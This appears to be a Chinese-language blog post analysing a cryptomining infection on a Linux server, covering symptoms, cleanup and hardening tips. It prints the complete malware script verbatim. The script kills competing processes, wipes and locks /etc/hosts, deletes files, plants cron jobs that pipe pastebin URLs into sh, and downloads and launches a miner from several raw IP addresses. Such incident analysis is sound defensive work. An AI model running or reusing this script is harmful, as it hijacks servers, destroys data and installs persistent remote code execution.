现象
1.本地/etc/hosts文件被清空,且无法编辑,导致域名无法解析
2.被添加定时任务,且无法删除
3.服务器运行的某些服务被杀掉
4.CPU拉满
异常分析
#1.特殊权限使用lsattr命令查看
:~ # lsattr /etc/hosts
---------ia-----e---- /etc/hosts
:~ # chattr -ai /etc/hosts
:~ # lsattr /etc/hosts
---------ia-----e---- /etc/hosts #感觉无法删除,但是实际上已经删除了,只不过病毒程序一直清空并添加特殊权限
#2.定时任务crontab
:~ # crontab -l
*/5 * * * * curl -fsSL https://pastebin.com/raw/bwD1BCXt | sh
:~ # crontab -e #无法编辑,因为这个文件一直被创建并且覆盖掉原来的文件
#3.服务器部署运行的大部分服务被杀掉,是因为这样病毒才能占用服务器大量的CPU去挖矿等,这是服务宕掉的原因,也是病毒窃取服务器CPU的方式
病毒脚本
#使用curl、wget命令可以加载病毒脚本
#!/bin/sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
ps aux | grep -v grep | grep 'givemexyz' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'dbuse' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'echo' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kdevtmp' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'urlopen' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'crun' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'javaupDates' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'x64b' | awk '{print $2}' | xargs -I % kill -9 %
ps -ef | grep /tmp/ | grep -v 'java|redis|mongod|grep|weblogic|oracle|solr'| cut -c 9-15 | xargs kill -9
ps aux | grep -v grep | grep 'xmi' | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v grep | grep 'xms' | awk '{print $2}' | xargs -I % kill -9 %
pgrep JavaUpdate | xargs -I % kill -9 %
pgrep kinsing | xargs -I % kill -9 %
pgrep network | xargs -I % kill -9 %
pgrep donate | xargs -I % kill -9 %
pgrep kdevtmpfsi | xargs -I % kill -9 %
pgrep crun | xargs -I % kill -9 %
pgrep sysupdate | xargs -I % kill -9 %
pgrep mysqlserver | xargs -I % kill -9 %
chattr -ia /var/spool/cron/root
crontab -r
crontab -l | grep -e "bwD1BCXt" | grep -v grep
if [ $? -eq 0 ]; then
echo "cron good"
else
(
crontab -l 2>/dev/null
echo "*/5 * * * * curl -fsSL https://pastebin.com/raw/bwD1BCXt | sh"
) | crontab -
fi
rm -f /tmp/.solra
pkill oracle.tmp
chattr -isa /tmp/*
chmod +rw /tmp/*
rm -f /tmp/*
rm -f /var/tmp/*
pp=$(ps auxf|grep javae|awk '{if($3>=50.0) print $2}')
name=""$pp
if [ -z "$name" ]
then
pkill weblogic.sh
pkill javae
else
rm -f /tmp/*
exit 1
fi
s2=`whoami`
if [ `whoami` = "root" ];
then
chattr -ia /etc/cron.d/*
rm -rf /etc/cron.d/*
chattr -i /var/spool/cron/crontabs/root
chattr -i /usr/local/bin/dns
rm -f /etc/cron.hourly/oanacroner
rm -f /etc/cron.hourly/oanacrona
rm -f /etc/cron.daily/oanacroner
rm -f /etc/cron.daily/oanacrona
rm -f /etc/cron.monthly/oanacroner
rm -f /usr/local/bin/dns
rm -f /etc/update.sh
chattr -ia /etc/hosts
echo >/etc/hosts
chattr +ia /etc/hosts
chattr -i /etc/sysupdate
rm -f /etc/sysupdate
rm -f /etc/config.json
rm -f /var/tmp/kworkerds
rm -f /usr/bin/.systemcero
rm -f /usr/bin/cloudupdate
rm -f /usr/bin/diskmanagerd
rm -f /lib/libterminfo.so
rm -f /bin/httpsntp
rm -f /bin/ftpsntp
rm -f /var/tmp/jspserv
rm -f /usr/sbin/cron
rm -f /usr/bin/kinsing*
rm -f /etc/cron.d/kinsing*
rm -f /usr/bin/node
chattr -isa /var/spool/cron/*
rm -rf /var/spool/cron/*
chattr +isa /tmp/xms
rm -f /var/tmp/kinsing
chattr -ia /etc/crontab
echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/kqK9uFpy | sh' > /etc/crontab
chattr +ia /etc/crontab
chattr -ia /var/spool/cron/root
chattr -ia /var/spool/cron/crontabs/root
echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/kqK9uFpy | bash' >/var/spool/cron/root
echo '*/10 * * * * curl -fsSL https://pastebin.com/raw/kqK9uFpy | bash' >/var/spool/cron/crontabs/root
echo '*/10 * * * * root curl -fsSL https://pastebin.com/raw/kqK9uFpy | sh' > /etc/cron.d/root
chattr +ia /var/spool/cron/root
chattr +ia /etc/cron.d/root
chattr +ia /var/spool/cron/crontabs/root
else
ps aux | grep -v 'java|redis|weblogic|mongod|mysql|oracle|tomcat|grep|postgres|confluence|awk|sbin|WebLogic.sh|server|aux|httpd|sh|sbin|' | grep ${s2:0:7} | awk '{print $2}' | xargs -I % kill -9 %
ps aux | grep -v 'java|redis|weblogic|mongod|mysql|oracle|tomcat|grep|postgres|confluence|awk|sbin|WebLogic.sh|server|aux|httpd|sh|sbin|' | grep $2 | awk '{print $2}' | xargs -I % kill -9 %
fi
chmod +777 /tmp/*
pkill node
pkill networkservice
pkill networkser+
pkill watchbog
pkill xmrig
pkill miner.sh
rm -rf /root/c3pool/*
rm -rf ~/c3pool/*
mkdir /tmp/dbusex
mkdir /var/tmp/dbusex
mkdir /var/tmp/go
mkdir /tmp/x86_64
mkdir /tmp/i686
mkdir /tmp/x86_643
mkdir /tmp/x64b
mkdir /tmp/go
mkdir /tmp/xmi
mkdir /tmp/zzz
mkdir /tmp/kingsing
pkill dbused
mkdir /var/tmp/kinsing
chmod -w /var/tmp/kinsing
mkdir /tmp/kdevtmpfsi
chmod -w /tmp/kdevtmpfsi
p=$(ps auxf|grep solrd|awk '{if($3>=60.0) print $2}')
name=""$p
if [ -z "$name" ]
then
pkill solr.sh
pkill solrd
ps aux | grep -v grep | grep -v 'java|redis|mongod|mysql|oracle|tomcat|grep|postgres|confluence|awk|aux|sh' | awk '{if($3>60.0) print $2}' | xargs -I % kill -9 %
mkdir /tmp/.solr
curl -fsSL http://136.243.19.213:8885/docs/config.json -o /tmp/.solr/config.json
curl -fsSL http://222.122.47.27:2143/auth/java.exe -o /tmp/.solr/solrd
curl -fsSL http://27.1.1.34:8080/docs/solr.sh -o /tmp/.solr/solr.sh
chmod +x /tmp/.solr/solrd
chmod +x /tmp/.solr/solr.sh
nohup /tmp/.solr/solr.sh &>>/dev/null &
sleep 10
rm -f /tmp/.solr/solr.sh
else
exit
fi
病毒内部代码逻辑参考
解决方法
#kill掉病毒程序的主进程
病毒攻击方式分析
1.系统漏洞
2.常用服务、自开发服务的漏洞
3.端口漏洞
4.弱密码漏洞
系统优化
#1.更新系统补丁
#2.修改redis等服务的绑定地址,限定可以连接Redis服务器的IP
#3.修改常用服务的端口
#4.修改服务器、服务的密码
#5.优化ssh服务,删除 ~/ssh/authorized_keys 下的陌生公钥
#6.在路由器上封禁IP或IP段